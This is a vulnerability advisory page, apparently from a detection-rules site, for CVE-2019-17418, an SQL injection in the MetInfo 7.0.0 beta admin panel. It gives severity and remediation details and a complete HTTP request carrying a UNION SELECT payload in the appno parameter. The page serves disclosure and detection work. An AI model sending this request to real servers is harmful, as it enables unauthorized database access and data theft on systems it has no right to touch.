🔙 목록으로 돌아가기

CVE-2019-17418: MetInfo 7.0.0 beta - SQL Injection

TitleMetInfo 7.0.0 beta - SQL Injection
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationUpgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor.
CVSS Score7.2
EPSS Score0.9357
CVE IDCVE-2019-17418
CWE IDCWE-89
Tags cve cve2019 metinfo sqli vuln

🔍 Vulnerability Description

MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).

🌐 HTTP Request

GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17418.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17418.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A